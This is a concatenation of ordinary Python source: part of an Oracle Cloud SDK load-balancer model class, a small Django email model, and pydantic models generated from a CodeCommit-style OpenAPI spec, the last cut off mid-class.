"""
return self._network_security_group_ids
@network_security_group_ids.setter
def network_security_group_ids(self, network_security_group_ids):
"""
Sets the network_security_group_ids of this CreateLoadBalancerDetails.
An array of NSG `OCIDs`__ associated with this load balancer.
During the load balancer's creation, the service adds the new load balancer to the specified NSGs.
The benefits of using NSGs with the load balancer include:
* NSGs define network security rules to govern ingress and egress traffic for the load balancer.
* The network security rules of other resources can reference the NSGs associated with the load balancer
to ensure access.
Example: `[\"ocid1.nsg.oc1.phx.unique_ID\"]`
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param network_security_group_ids: The network_security_group_ids of this CreateLoadBalancerDetails.
:type: list[str]
"""
self._network_security_group_ids = network_security_group_ids
@property
def subnet_ids(self):
"""
**[Required]** Gets the subnet_ids of this CreateLoadBalancerDetails.
An array of subnet `OCIDs`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The subnet_ids of this CreateLoadBalancerDetails.
:rtype: list[str]
"""
return self._subnet_ids
@subnet_ids.setter
def subnet_ids(self, subnet_ids):
"""
Sets the subnet_ids of this CreateLoadBalancerDetails.
An array of subnet `OCIDs`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param subnet_ids: The subnet_ids of this CreateLoadBalancerDetails.
:type: list[str]
"""
self._subnet_ids = subnet_ids
@property
def certificates(self):
"""
Gets the certificates of this CreateLoadBalancerDetails.
:return: The certificates of this CreateLoadBalancerDetails.
:rtype: dict(str, CertificateDetails)
"""
return self._certificates
@certificates.setter
def certificates(self, certificates):
"""
Sets the certificates of this CreateLoadBalancerDetails.
:param certificates: The certificates of this CreateLoadBalancerDetails.
:type: dict(str, CertificateDetails)
"""
self._certificates = certificates
@property
def ssl_cipher_suites(self):
"""
Gets the ssl_cipher_suites of this CreateLoadBalancerDetails.
:return: The ssl_cipher_suites of this CreateLoadBalancerDetails.
:rtype: dict(str, SSLCipherSuiteDetails)
"""
return self._ssl_cipher_suites
@ssl_cipher_suites.setter
def ssl_cipher_suites(self, ssl_cipher_suites):
"""
Sets the ssl_cipher_suites of this CreateLoadBalancerDetails.
:param ssl_cipher_suites: The ssl_cipher_suites of this CreateLoadBalancerDetails.
:type: dict(str, SSLCipherSuiteDetails)
"""
self._ssl_cipher_suites = ssl_cipher_suites
@property
def path_route_sets(self):
"""
Gets the path_route_sets of this CreateLoadBalancerDetails.
:return: The path_route_sets of this CreateLoadBalancerDetails.
:rtype: dict(str, PathRouteSetDetails)
"""
return self._path_route_sets
@path_route_sets.setter
def path_route_sets(self, path_route_sets):
"""
Sets the path_route_sets of this CreateLoadBalancerDetails.
:param path_route_sets: The path_route_sets of this CreateLoadBalancerDetails.
:type: dict(str, PathRouteSetDetails)
"""
self._path_route_sets = path_route_sets
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this CreateLoadBalancerDetails.
Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace.
For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:return: The freeform_tags of this CreateLoadBalancerDetails.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this CreateLoadBalancerDetails.
Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace.
For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:param freeform_tags: The freeform_tags of this CreateLoadBalancerDetails.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
@property
def defined_tags(self):
"""
Gets the defined_tags of this CreateLoadBalancerDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:return: The defined_tags of this CreateLoadBalancerDetails.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this CreateLoadBalancerDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:param defined_tags: The defined_tags of this CreateLoadBalancerDetails.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
@property
def rule_sets(self):
"""
Gets the rule_sets of this CreateLoadBalancerDetails.
:return: The rule_sets of this CreateLoadBalancerDetails.
:rtype: dict(str, RuleSetDetails)
"""
return self._rule_sets
@rule_sets.setter
def rule_sets(self, rule_sets):
"""
Sets the rule_sets of this CreateLoadBalancerDetails.
:param rule_sets: The rule_sets of this CreateLoadBalancerDetails.
:type: dict(str, RuleSetDetails)
"""
self._rule_sets = rule_sets
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
from django.db import models
from django.core.mail import EmailMessage
# This class represents an unsent email
class Email(models.Model):
SUBJECT_MAX_LEN = 255
datetime = models.DateTimeField(auto_now_add=True, verbose_name='date')
subject = models.CharField(max_length=SUBJECT_MAX_LEN, verbose_name='sujet',)
from_email = models.EmailField(verbose_name='adresse mail source',)
body = models.TextField(verbose_name='contenu')
def to_message(self):
msg = EmailMessage(
self.subject,
self.body,
self.from_email,
[str(dest) for dest in self.to.all()],
[],
)
for attachment in self.attachments.all():
msg.attach(*attachment.to_tuple())
return msg
class DestAddr(models.Model):
email = models.ForeignKey(Email, related_name='to', on_delete=models.CASCADE)
addr = models.EmailField(verbose_name='adresse mail',)
def __str__(self):
return self.addr
class Attachment(models.Model):
FILENAME_MAX_LEN = 255
MIMETYPE_MAX_LEN = 255
email = models.ForeignKey(Email, related_name='attachments', on_delete=models.CASCADE)
filename = models.CharField(max_length=FILENAME_MAX_LEN, verbose_name='nom',)
mimetype = models.CharField(max_length=MIMETYPE_MAX_LEN, verbose_name='mimetype',)
content = models.TextField(verbose_name='contenu',)
def to_tuple(self):
return self.filename, self.content, self.mimetype
|
# generated by datamodel-codegen:
# filename: openapi.yaml
# timestamp: 2021-12-31T02:46:26+00:00
from __future__ import annotations
from datetime import datetime
from enum import Enum
from typing import Annotated, Any, List, Optional
from pydantic import BaseModel, Extra, Field
class ApprovalRuleTemplateNameRequiredException(BaseModel):
__root__: Any
class InvalidApprovalRuleTemplateNameException(
ApprovalRuleTemplateNameRequiredException
):
pass
class ApprovalRuleTemplateDoesNotExistException(
ApprovalRuleTemplateNameRequiredException
):
pass
class MaximumRuleTemplatesAssociatedWithRepositoryException(
ApprovalRuleTemplateNameRequiredException
):
pass
class RepositoryNameRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidRepositoryNameException(ApprovalRuleTemplateNameRequiredException):
pass
class RepositoryDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class EncryptionIntegrityChecksFailedException(
ApprovalRuleTemplateNameRequiredException
):
pass
class EncryptionKeyAccessDeniedException(ApprovalRuleTemplateNameRequiredException):
pass
class EncryptionKeyDisabledException(ApprovalRuleTemplateNameRequiredException):
pass
class EncryptionKeyNotFoundException(ApprovalRuleTemplateNameRequiredException):
pass
class EncryptionKeyUnavailableException(ApprovalRuleTemplateNameRequiredException):
pass
class RepositoryNamesRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class MaximumRepositoryNamesExceededException(
ApprovalRuleTemplateNameRequiredException
):
pass
class MergeOptionRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidMergeOptionException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidContinuationTokenException(ApprovalRuleTemplateNameRequiredException):
pass
class CommitRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class CommitDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidCommitException(ApprovalRuleTemplateNameRequiredException):
pass
class TipsDivergenceExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidMaxConflictFilesException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidMaxMergeHunksException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidConflictDetailLevelException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidConflictResolutionStrategyException(
ApprovalRuleTemplateNameRequiredException
):
pass
class MaximumFileContentToLoadExceededException(
ApprovalRuleTemplateNameRequiredException
):
pass
class MaximumItemsToCompareExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class CommitIdsListRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class CommitIdsLimitExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class ApprovalRuleTemplateNameAlreadyExistsException(
ApprovalRuleTemplateNameRequiredException
):
pass
class ApprovalRuleTemplateContentRequiredException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidApprovalRuleTemplateContentException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidApprovalRuleTemplateDescriptionException(
ApprovalRuleTemplateNameRequiredException
):
pass
class NumberOfRuleTemplatesExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class BranchNameRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class BranchNameExistsException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidBranchNameException(ApprovalRuleTemplateNameRequiredException):
pass
class CommitIdRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidCommitIdException(ApprovalRuleTemplateNameRequiredException):
pass
class ParentCommitIdRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidParentCommitIdException(ApprovalRuleTemplateNameRequiredException):
pass
class ParentCommitDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class ParentCommitIdOutdatedException(ApprovalRuleTemplateNameRequiredException):
pass
class BranchDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class BranchNameIsTagNameException(ApprovalRuleTemplateNameRequiredException):
pass
class FileEntryRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class MaximumFileEntriesExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class PutFileEntryConflictException(ApprovalRuleTemplateNameRequiredException):
pass
class SourceFileOrContentRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class FileContentAndSourceFileSpecifiedException(
ApprovalRuleTemplateNameRequiredException
):
pass
class PathRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidPathException(ApprovalRuleTemplateNameRequiredException):
pass
class SamePathRequestException(ApprovalRuleTemplateNameRequiredException):
pass
class FileDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class FileContentSizeLimitExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class FolderContentSizeLimitExceededException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidDeletionParameterException(ApprovalRuleTemplateNameRequiredException):
pass
class RestrictedSourceFileException(ApprovalRuleTemplateNameRequiredException):
pass
class FileModeRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidFileModeException(ApprovalRuleTemplateNameRequiredException):
pass
class NameLengthExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidEmailException(ApprovalRuleTemplateNameRequiredException):
pass
class CommitMessageLengthExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class NoChangeException(ApprovalRuleTemplateNameRequiredException):
pass
class FileNameConflictsWithDirectoryNameException(
ApprovalRuleTemplateNameRequiredException
):
pass
class DirectoryNameConflictsWithFileNameException(
ApprovalRuleTemplateNameRequiredException
):
pass
class FilePathConflictsWithSubmodulePathException(
ApprovalRuleTemplateNameRequiredException
):
pass
class ClientRequestTokenRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidClientRequestTokenException(ApprovalRuleTemplateNameRequiredException):
pass
class IdempotencyParameterMismatchException(ApprovalRuleTemplateNameRequiredException):
pass
class ReferenceNameRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidReferenceNameException(ApprovalRuleTemplateNameRequiredException):
pass
class ReferenceDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class ReferenceTypeNotSupportedException(ApprovalRuleTemplateNameRequiredException):
pass
class TitleRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidTitleException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidDescriptionException(ApprovalRuleTemplateNameRequiredException):
pass
class TargetsRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidTargetsException(ApprovalRuleTemplateNameRequiredException):
pass
class TargetRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidTargetException(ApprovalRuleTemplateNameRequiredException):
pass
class MultipleRepositoriesInPullRequestException(
ApprovalRuleTemplateNameRequiredException
):
pass
class MaximumOpenPullRequestsExceededException(
ApprovalRuleTemplateNameRequiredException
):
pass
class SourceAndDestinationAreSameException(ApprovalRuleTemplateNameRequiredException):
pass
class ApprovalRuleNameRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidApprovalRuleNameException(ApprovalRuleTemplateNameRequiredException):
pass
class ApprovalRuleNameAlreadyExistsException(ApprovalRuleTemplateNameRequiredException):
pass
class ApprovalRuleContentRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidApprovalRuleContentException(ApprovalRuleTemplateNameRequiredException):
pass
class NumberOfRulesExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class PullRequestDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidPullRequestIdException(ApprovalRuleTemplateNameRequiredException):
pass
class PullRequestIdRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class PullRequestAlreadyClosedException(ApprovalRuleTemplateNameRequiredException):
pass
class RepositoryNameExistsException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidRepositoryDescriptionException(ApprovalRuleTemplateNameRequiredException):
pass
class RepositoryLimitExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidTagsMapException(ApprovalRuleTemplateNameRequiredException):
pass
class TooManyTagsException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidSystemTagUsageException(ApprovalRuleTemplateNameRequiredException):
pass
class TagPolicyException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidConflictResolutionException(ApprovalRuleTemplateNameRequiredException):
pass
class ManualMergeRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class MaximumConflictResolutionEntriesExceededException(
ApprovalRuleTemplateNameRequiredException
):
pass
class MultipleConflictResolutionEntriesException(
ApprovalRuleTemplateNameRequiredException
):
pass
class ReplacementTypeRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidReplacementTypeException(ApprovalRuleTemplateNameRequiredException):
pass
class ReplacementContentRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidReplacementContentException(ApprovalRuleTemplateNameRequiredException):
pass
class ConcurrentReferenceUpdateException(ApprovalRuleTemplateNameRequiredException):
pass
class ApprovalRuleTemplateInUseException(ApprovalRuleTemplateNameRequiredException):
pass
class DefaultBranchCannotBeDeletedException(ApprovalRuleTemplateNameRequiredException):
pass
class CommentDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class CommentIdRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidCommentIdException(ApprovalRuleTemplateNameRequiredException):
pass
class CommentDeletedException(ApprovalRuleTemplateNameRequiredException):
pass
class CannotDeleteApprovalRuleFromTemplateException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidPullRequestEventTypeException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidActorArnException(ApprovalRuleTemplateNameRequiredException):
pass
class ActorDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidMaxResultsException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidRevisionIdException(ApprovalRuleTemplateNameRequiredException):
pass
class RevisionIdRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class RevisionNotCurrentException(ApprovalRuleTemplateNameRequiredException):
pass
class BlobIdRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidBlobIdException(ApprovalRuleTemplateNameRequiredException):
pass
class BlobIdDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class FileTooLargeException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidReactionUserArnException(ApprovalRuleTemplateNameRequiredException):
pass
class RepositoryNotAssociatedWithPullRequestException(
ApprovalRuleTemplateNameRequiredException
):
pass
class CommitIdDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class PathDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class FolderDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidDestinationCommitSpecifierException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidSourceCommitSpecifierException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidPullRequestStatusException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidAuthorArnException(ApprovalRuleTemplateNameRequiredException):
pass
class AuthorDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidSortByException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidOrderException(ApprovalRuleTemplateNameRequiredException):
pass
class ResourceArnRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidResourceArnException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidTargetBranchException(ApprovalRuleTemplateNameRequiredException):
pass
class TipOfSourceReferenceIsDifferentException(
ApprovalRuleTemplateNameRequiredException
):
pass
class PullRequestApprovalRulesNotSatisfiedException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidOverrideStatusException(ApprovalRuleTemplateNameRequiredException):
pass
class OverrideStatusRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class OverrideAlreadySetException(ApprovalRuleTemplateNameRequiredException):
pass
class CommentContentRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class CommentContentSizeLimitExceededException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidFileLocationException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidRelativeFileVersionEnumException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidFilePositionException(ApprovalRuleTemplateNameRequiredException):
pass
class BeforeCommitIdAndAfterCommitIdAreSameException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidReactionValueException(ApprovalRuleTemplateNameRequiredException):
pass
class ReactionValueRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class ReactionLimitExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class FileContentRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class SameFileContentException(ApprovalRuleTemplateNameRequiredException):
pass
class RepositoryTriggersListRequiredException(
ApprovalRuleTemplateNameRequiredException
):
pass
class MaximumRepositoryTriggersExceededException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidRepositoryTriggerNameException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidRepositoryTriggerDestinationArnException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidRepositoryTriggerRegionException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidRepositoryTriggerCustomDataException(
ApprovalRuleTemplateNameRequiredException
):
pass
class MaximumBranchesExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidRepositoryTriggerBranchNameException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidRepositoryTriggerEventsException(
ApprovalRuleTemplateNameRequiredException
):
pass
class RepositoryTriggerNameRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class RepositoryTriggerDestinationArnRequiredException(
ApprovalRuleTemplateNameRequiredException
):
pass
class RepositoryTriggerBranchNameListRequiredException(
ApprovalRuleTemplateNameRequiredException
):
pass
class RepositoryTriggerEventsListRequiredException(
ApprovalRuleTemplateNameRequiredException
):
pass
class TagsMapRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class TagKeysListRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidTagKeysListException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidRuleContentSha256Exception(ApprovalRuleTemplateNameRequiredException):
pass
class CommentNotCreatedByCallerException(ApprovalRuleTemplateNameRequiredException):
pass
class ApprovalRuleDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class CannotModifyApprovalRuleFromTemplateException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidApprovalStateException(ApprovalRuleTemplateNameRequiredException):
pass
class ApprovalStateRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class PullRequestCannotBeApprovedByAuthorException(
ApprovalRuleTemplateNameRequiredException
):
pass
class MaximumNumberOfApprovalsExceededException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidPullRequestStatusUpdateException(
ApprovalRuleTemplateNameRequiredException
):
pass
class PullRequestStatusRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class AccountId(BaseModel):
__root__: str
class AdditionalData(AccountId):
pass
class Arn(AccountId):
pass
class ApprovalState(Enum):
APPROVE = 'APPROVE'
REVOKE = 'REVOKE'
class Approval(BaseModel):
"""
Returns information about a specific approval on a pull request.
"""
userArn: Optional[Arn] = None
approvalState: Optional[ApprovalState] = None
class ApprovalList(BaseModel):
__root__: List[Approval]
class ApprovalRuleId(AccountId):
pass
class ApprovalRuleName(BaseModel):
__root__: Annotated[str, Field(max_length=100, min_length=1)]
class ApprovalRuleContent(BaseModel):
__root__: Annotated[str, Field(max_length=3000, min_length=1)]
class RuleContentSha256(AccountId):
pass
class LastModifiedDate(BaseModel):
__root__: datetime
class CreationDate(LastModifiedDate):
pass
class ApprovalRuleEventMetadata(BaseModel):
"""
Returns information about an event for an approval rule.
"""
approvalRuleName: Optional[ApprovalRuleName] = None
approvalRuleId: Optional[ApprovalRuleId] = None
approvalRuleContent: Optional[ApprovalRuleContent] = None
class RevisionId(AccountId):
pass
class OverrideStatus(Enum):
OVERRIDE = 'OVERRIDE'
REVOKE = 'REVOKE'
class ApprovalRuleOverriddenEventMetadata(BaseModel):
"""
Returns information about an override event for approval rules for a pull request.
"""
revisionId: Optional[RevisionId] = None
overrideStatus: Optional[OverrideStatus] = None
class ApprovalRuleTemplateId(AccountId):
pass
class ApprovalRuleTemplateName(ApprovalRuleName):
pass
class ApprovalRuleTemplateDescription(BaseModel):
__root__: Annotated[str, Field(max_length=1000, min_length=0)]
class ApprovalRuleTemplateContent(ApprovalRuleContent):
pass
class ApprovalRuleTemplate(BaseModel):
"""
Returns information about an approval rule template.
"""
approvalRuleTemplateId: Optional[ApprovalRuleTemplateId] = None
approvalRuleTemplateName: Optional[ApprovalRuleTemplateName] = None
approvalRuleTemplateDescription: Optional[ApprovalRuleTemplateDescription] = None
approvalRuleTemplateContent: Optional[ApprovalRuleTemplateContent] = None
ruleContentSha256: Optional[RuleContentSha256] = None
lastModifiedDate: Optional[LastModifiedDate] = None
creationDate: Optional[CreationDate] = None
lastModifiedUser: Optional[Arn] = None
class ApprovalRuleTemplateNameList(BaseModel):
__root__: List[ApprovalRuleTemplateName]
class ApprovalRulesNotSatisfiedList(BaseModel):
__root__: List[ApprovalRuleName]
class ApprovalRulesSatisfiedList(ApprovalRulesNotSatisfiedList):
pass
class ApprovalStateChangedEventMetadata(BaseModel):
"""
Returns information about a change in the approval state for a pull request.
"""
revisionId: Optional[RevisionId] = None
approvalStatus: Optional[ApprovalState] = None
class Approved(BaseModel):
__root__: bool
class RepositoryName(BaseModel):
__root__: Annotated[str, Field(max_length=100, min_length=1, regex='[\\w\\.-]+')]
class ErrorCode(AccountId):
pass
class ErrorMessage(AccountId):
pass
class BatchAssociateApprovalRuleTemplateWithRepositoriesError(BaseModel):
"""
Returns information about errors in a BatchAssociateApprovalRuleTemplateWithRepositories operation.
"""
repositoryName: Optional[RepositoryName] = None
errorCode: Optional[ErrorCode] = None
errorMessage: Optional[ErrorMessage] = None
class BatchAssociateApprovalRuleTemplateWithRepositoriesErrorsList(BaseModel):
__root__: List[BatchAssociateApprovalRuleTemplateWithRepositoriesError]
class RepositoryNameList(BaseModel):
__root__: List[RepositoryName]
class Path(AccountId):
pass
class ExceptionName(AccountId):
pass
class Message(AccountId):
pass
class BatchDescribeMergeConflictsError(BaseModel):
"""
Returns information about errors in a BatchDescribeMergeConflicts operation.
"""
filePath: Path
exceptionName: ExceptionName
message: Message
class BatchDescribeMergeConflictsErrors(BaseModel):
__root__: List[BatchDescribeMergeConflictsError]
class CommitName(AccountId):
pass
class MergeOptionTypeEnum(Enum):
FAST_FORWARD_MERGE = 'FAST_FORWARD_MERGE'
SQUASH_MERGE = 'SQUASH_MERGE'
THREE_WAY_MERGE = 'THREE_WAY_MERGE'
class MaxResults(BaseModel):
__root__: int
class FilePaths(BaseModel):
__root__: List[Path]
class ConflictDetailLevelTypeEnum(Enum):
FILE_LEVEL = 'FILE_LEVEL'
LINE_LEVEL = 'LINE_LEVEL'
class ConflictResolutionStrategyTypeEnum(Enum):
NONE = 'NONE'
ACCEPT_SOURCE = 'ACCEPT_SOURCE'
ACCEPT_DESTINATION = 'ACCEPT_DESTINATION'
AUTOMERGE = 'AUTOMERGE'
class NextToken(AccountId):
pass
class ObjectId(AccountId):
pass
class BatchDisassociateApprovalRuleTemplateFromRepositoriesError(
BatchAssociateApprovalRuleTemplateWithRepositoriesError
):
"""
Returns information about errors in a BatchDisassociateApprovalRuleTemplateFromRepositories operation.
"""
pass
class BatchDisassociateApprovalRuleTemplateFromRepositoriesErrorsList(BaseModel):
__root__: List[BatchDisassociateApprovalRuleTemplateFromRepositoriesError]
class BatchGetCommitsError(BaseModel):
"""
Returns information about errors in a BatchGetCommits operation.
"""
commitId: Optional[ObjectId] = None
errorCode: Optional[ErrorCode] = None
errorMessage: Optional[ErrorMessage] = None
class BatchGetCommitsErrorsList(BaseModel):
__root__: List[BatchGetCommitsError]
class CommitIdsInputList(BaseModel):
__root__: List[ObjectId]
class RepositoryNotFoundList(RepositoryNameList):
pass
class Mode(AccountId):
pass
class BlobMetadata(BaseModel):
"""
Returns information about a specific Git blob object.
"""
blobId: Optional[ObjectId] = None
path: Optional[Path] = None
mode: Optional[Mode] = None
class BranchName(BaseModel):
__root__: Annotated[str, Field(max_length=256, min_length=1)]
class CommitId(AccountId):
pass
class BranchInfo(BaseModel):
"""
Returns information about a branch.
"""
branchName: Optional[BranchName] = None
commitId: Optional[CommitId] = None
class BranchNameList(BaseModel):
__root__: List[BranchName]
class ReactionValue(AccountId):
pass
class CallerReactions(BaseModel):
__root__: List[ReactionValue]
class CapitalBoolean(Approved):
pass
class ChangeTypeEnum(Enum):
A = 'A'
M = 'M'
D = 'D'
class ClientRequestToken(AccountId):
pass
class CloneUrlHttp(AccountId):
pass
class CloneUrlSsh(AccountId):
pass
class CommentId(AccountId):
pass
class Content(AccountId):
pass
class IsCommentDeleted(Approved):
pass
class ReactionCountsMap(BaseModel):
pass
class Config:
extra = Extra.allow
class Comment(BaseModel):
"""
Returns information about a specific comment.
"""
commentId: Optional[CommentId] = None
content: Optional[Content] = None
inReplyTo: Optional[CommentId] = None
creationDate: Optional[CreationDate] = None
lastModifiedDate: Optional[LastModifiedDate] = None
authorArn: Optional[Arn] = None
deleted: Optional[IsCommentDeleted] = None
clientRequestToken: Optional[ClientRequestToken] = None
callerReactions: Optional[CallerReactions] = None
reactionCounts: Optional[ReactionCountsMap] = None
class Comments(BaseModel):
__root__: List[Comment]
class PullRequestId(AccountId):
pass
class ParentList(CommitIdsInputList):
pass
class NumberOfConflicts(MaxResults):
pass
class IsBinaryFile(BaseModel):
"""
Information about whether a file is binary or textual in a merge or pull request operation.
"""
source: Optional[CapitalBoolean] = None
destination: Optional[CapitalBoolean] = None
base: Optional[CapitalBoolean] = None
class IsContentConflict(Approved):
pass
class IsFileModeConflict(Approved):
pass
class IsObjectTypeConflict(Approved):
pass
class MergeOperations(BaseModel):
"""
Information about the file operation conflicts in a merge operation.
"""
source: Optional[ChangeTypeEnum] = None
destination: Optional[ChangeTypeEnum] = None
class Count(MaxResults):
pass
class Name(AccountId):
pass
class Email(AccountId):
pass
class KeepEmptyFolders(Approved):
pass
class Title(BaseModel):
__root__: Annotated[str, Field(max_length=150)]
class Description(BaseModel):
__root__: Annotated[str, Field(max_length=10240)]
class RepositoryDescription(BaseModel):
__root__: Annotated[str, Field(max_length=1000)]
class TagsMap(BaseModel):
pass
class Config:
extra = Extra.allow
class Date(AccountId):
pass
class DeleteFileEntry(BaseModel):
"""
A file that is deleted as part of a commit.
"""
filePath: Path
class RepositoryId(AccountId):
pass
class PullRequestEventType(Enum):
PULL_REQUEST_CREATED = 'PULL_REQUEST_CREATED'
PULL_REQUEST_STATUS_CHANGED = 'PULL_REQUEST_STATUS_CHANGED'
PULL_REQUEST_SOURCE_REFERENCE_UPDATED = 'PULL_REQUEST_SOURCE_REFERENCE_UPDATED'
PULL_REQUEST_MERGE_STATE_CHANGED = 'PULL_REQUEST_MERGE_STATE_CHANGED'
PULL_REQUEST_APPROVAL_RULE_CREATED = 'PULL_REQUEST_APPROVAL_RULE_CREATED'
PULL_REQUEST_APPROVAL_RULE_UPDATED = 'PULL_REQUEST_APPROVAL_RULE_UPDATED'
PULL_REQUEST_APPROVAL_RULE_DELETED = 'PULL_REQUEST_APPROVAL_RULE_DELETED'
PULL_REQUEST_APPROVAL_RULE_OVERRIDDEN = 'PULL_REQUEST_APPROVAL_RULE_OVERRIDDEN'
PULL_REQUEST_APPROVAL_STATE_CHANGED = 'PULL_REQUEST_APPROVAL_STATE_CHANGED'
class Difference(BaseModel):
"""
Returns information about a set of differences for a commit specifier.
"""
